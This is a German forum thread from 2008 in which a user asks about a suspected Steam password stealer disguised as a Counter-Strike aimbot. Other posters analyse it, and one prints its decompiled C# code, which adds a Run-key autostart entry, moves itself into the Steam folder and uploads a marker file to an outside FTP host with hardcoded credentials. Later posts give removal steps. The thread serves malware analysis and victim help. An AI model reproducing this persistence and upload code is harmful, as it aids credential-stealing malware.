Angst um meinen Rechner ;/

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von deo, 24. Februar 2008 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 24. Februar 2008
    Hi, so dumm es auch von mir war, vielleicht mag mir ja trotzdem jemand helfen, und zwar hab ich mir von d3scene nen Aimbot für CS 1.6 geladen.

    Als ich ihn starten wollte kam nen Error und dann nen Steam Login Fenster natürlich hab ich nichts dort eingegeben, denke es war nen Fishing Programm.

    Da sich aber die .exe nach ausführen verabschiedet hat, hab ich nun bisschen Angst um den Rest meines PCs könnte jmd die exe mal sich anschauen und sagen was sie macht bzw an wen sie die Daten verschickt?

    Wäre sehr nett.


    gruß deo

    die exE:

    http://rs312.rapidshare.com/files/89536875/AdvanceHookv1.0.rar
     
  2. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    netter steam pass stealer.

    Status: Ich analysiere weiter
     
  3. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    Jio... auch gerade gesehen einfach mal aufpassen was für ne man sich lädt echt hohl manche Leute sorry aber ist so... Bei google nachm aimbot suchen [cheaten alleine gehört schon bestraft] und dann noch irgendwas x beliebiges runterladen OMG !!11

    Auf gut deutsch gesagt selber Schuld... Hol dir nen gutes Av Prog versuch das shice Ding runterzuschmeissen und dann möglichst schnell das Steam Pw changen
     
  4. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    nondetected. Ich weiß aber schon was es macht. bin noch am analysieren. aber eig. keinen bock ne vm aufzusetzen.

    Mal abgesehen davon bin ich intressenkonfilikt. Disassembler vs. Bett
     
  5. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    lol du bist also am "analysieren" na dann will ich dir mal helfen:

    Code:
    private void Form1_Load(object sender, EventArgs e)
    {
     MyProject.Forms.Form2.Hide();
     if (!Directory.Exists(@"C:\Program Files\Steam\resource\info"))
     {
     Directory.CreateDirectory(@"C:\Program Files\Steam\resource\info");
     }
     if (Operators.ConditionalCompareObjectNotEqual(Registry.GetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Steam", ""), "", false))
     {
     this.reg = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
     this.reg.DeleteValue("Steam");
     }
     if (!File.Exists(@"C:\Program Files\Steam\Steamstart.exe"))
     {
     Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "RunSteam", @"C:\Program Files\Steam\Steamstart.exe");
     File.Move(this.appname, @"C:\Program Files\Steam\Steamstart.exe");
     File.WriteAllText(@"C:\Program Files\Steam\resource\info\test.txt", "victim!");
     MyProject.Computer.Network.UploadFile(@"C:\Program Files\Steam\resource\info\test.txt", "ftp://ftp.tripod.com/test.txt", "itchy86", "rockie");
     Interaction.MsgBox("A key file needed to run this application is missing,please locate this object to procede.", MsgBoxStyle.Critical | MsgBoxStyle.OkCancel, "Error!");
     this.Close();
     }
    }
     
  6. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    joar
    http://rapidshare.com/files/94405712/Steam.rar.html
    der ordner wird wohl angelegt und halt bei jedem neustart geöffnet.

    is echt nur nen logger?

    oder steam hack?
     
  7. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    @N0S:

    das weiß ich auch (darfür braucht man ja wohl nicht lange), auch wenn du nen paar(intressante) zeilen vergessen hast.

    Wie hast du eigentlich den VB code (in solch einer schönen formatierung) wiederhergestellt (ich habe noch nie mit vb gearbeitet)?

    @deo:

    also lösch in der Registry:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run den Eintrag "RunSteam"

    und den Ordner C:\Program Files\Steam\


    Was aber ziemlich witzig ist, ist a) die Tatsache das das Prog extrem schlecht programmiert ist und b) Das man annehmen kann, das der programmierer dies auf dem computer seiner Mutter (username "Mom") programmiert hat.
     
  8. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    das ist kein vb syntax sondern C# wobei das sowieso egal ist, weil es sowieso sehr leicht zu verstehen ist... probiers mit einem .Net decompiler
    ist nur ein billiges kiddie programm, der ftp login geht auch nichtmehr also ist das programm nutzlos und ungefährlich
     
  9. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    hast recht, mein gehirn arbeitet unter übermüdung net so toll, dachte der peheader gehöre zu Visual Basic. Ist aber (wie du sagtest) Microsoft Visual C# / Basic .NET. Jo, ist wirklich nen billiges kiddie progg, kann jeder besser machen. Das mit dem FTP acc habe ich auch schon getestet (tripod omg).

    hat in dem fall eh nur versucht folgendes zu senden:


    (omg, fester dateipfad)


    Zu: "probiers mit einem .Net decompiler"

    a) hasse ich Decompiler b) sind die (finde ich) auch eher was für kids


    So und ich geh jetzt pennen {bild-down: http://www.addis-welt.de/smilie/smilie/schlafen/sleep.gif}
     
  10. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    um rauszufinden was dieses programm macht hat das "kid" aber nur ca. 10sek gebraucht (wenn man das entpacken noch mit einberechnet) und du hast sicher wesentlich länger gebraucht... hast dabei bestimmt insgesamt 20min verschwendet mit deinen postings noch... naja wenn du nichts besseres zutun hast, als kiddie programme zu "analysieren"... =)
     
  11. 24. Februar 2008
    AW: Angst um meinen Rechner ;/

    naja, waren vieleicht 2Minuten (incl download). Wenn alle leute immer was besseres zu tun hätten, wäre die computertechnik noch nicht so weit.

    done? wie wäre es eig. mit nem close?
     
  12. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.